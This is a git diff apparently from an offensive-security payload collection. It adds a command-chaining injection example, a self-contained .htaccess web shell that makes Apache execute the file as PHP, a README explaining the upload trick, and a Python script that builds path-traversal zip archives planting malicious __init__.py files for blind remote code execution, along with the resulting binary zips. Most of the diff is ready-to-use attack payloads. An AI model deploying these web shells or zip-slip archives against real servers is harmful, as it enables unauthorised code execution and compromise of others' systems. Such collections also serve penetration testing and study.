diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 8a68054..3ffd7b1 100644
--- a/Remote commands execution/README.md
+++ b/Remote commands execution/README.md
@@ -17,6 +17,7 @@ Commands execution by chaining commands
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
+original_cmd_by_server || ls Only if the first cmd fail
```
Commands execution inside a command
diff --git a/Upload insecure files/PHP .htaccess/.htaccess b/Upload insecure files/PHP .htaccess/.htaccess
new file mode 100644
index 0000000..9abc36b
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/.htaccess
@@ -0,0 +1,14 @@
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+
+Order allow,deny
+Allow from all
+
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### &1"); ?>###### LLEHS ######
diff --git a/Upload insecure files/PHP .htaccess/README.md b/Upload insecure files/PHP .htaccess/README.md
new file mode 100644
index 0000000..719aff3
--- /dev/null
+++ b/Upload insecure files/PHP .htaccess/README.md
@@ -0,0 +1,27 @@
+# .htaccess upload
+Uploading an .htaccess file to override Apache rule and execute PHP.
+"Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
+
+
+Self contained .htaccess web shell
+```
+# Self contained .htaccess web shell - Part of the htshell project
+# Written by Wireghoul - http://www.justanotherhacker.com
+
+# Override default deny rule to make .htaccess file accessible over web
+
+Order allow,deny
+Allow from all
+
+
+# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
+# the apache directoves from the .htaccess file
+AddType application/x-httpd-php .htaccess
+
+###### SHELL ###### &1"); ?>###### LLEHS ######
+```
+
+
+## Thanks to
+* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
diff --git a/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip b/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip
new file mode 100644
index 0000000..69f89c5
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-admin-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip b/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip
new file mode 100644
index 0000000..4eef395
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-conf-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-config-__init__.py.zip b/Upload insecure files/Python __init__.py/python-config-__init__.py.zip
new file mode 100644
index 0000000..61e0f11
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-config-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip b/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip
new file mode 100644
index 0000000..7e7f015
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-controllers-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-generate-init.py b/Upload insecure files/Python __init__.py/python-generate-init.py
new file mode 100644
index 0000000..d1efac0
--- /dev/null
+++ b/Upload insecure files/Python __init__.py/python-generate-init.py
@@ -0,0 +1,19 @@
+# Generating "evil" zip file
+# Based on the work of Ajin Abraham
+# Vuln website : https://github.com/ajinabraham/bad_python_extract
+# More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution
+
+# Warning 1: need a restart from the server OR debug=True
+# Warning 2: you won't get the output of the command (blind rce)
+import zipfile
+
+directories = ["conf", "config", "settings", "utils", "urls", "view", "tests", "scripts", "controllers", "modules", "models", "admin", "login"]
+for d in directories:
+ name = "python-"+d+"-__init__.py.zip"
+ zipf = zipfile.ZipFile(name, 'w', zipfile.ZIP_DEFLATED)
+ zipf.close()
+ z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
+ z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
+ z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
+ z_info.external_attr = 0777 << 16L
+ z_file.close()
diff --git a/Upload insecure files/Python __init__.py/python-login-__init__.py.zip b/Upload insecure files/Python __init__.py/python-login-__init__.py.zip
new file mode 100644
index 0000000..5f67036
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-login-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-models-__init__.py.zip b/Upload insecure files/Python __init__.py/python-models-__init__.py.zip
new file mode 100644
index 0000000..75c2e0f
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-models-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip b/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip
new file mode 100644
index 0000000..47e5e5e
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-modules-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip b/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip
new file mode 100644
index 0000000..a2bbe3b
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-scripts-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip b/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip
new file mode 100644
index 0000000..4ea8d06
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-settings-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip b/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip
new file mode 100644
index 0000000..ebca369
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-tests-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip b/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip
new file mode 100644
index 0000000..13b89ed
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-urls-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip b/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip
new file mode 100644
index 0000000..3622020
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-utils-__init__.py.zip differ
diff --git a/Upload insecure files/Python __init__.py/python-view-__init__.py.zip b/Upload insecure files/Python __init__.py/python-view-__init__.py.zip
new file mode 100644
index 0000000..29ed3a0
Binary files /dev/null and b/Upload insecure files/Python __init__.py/python-view-__init__.py.zip differ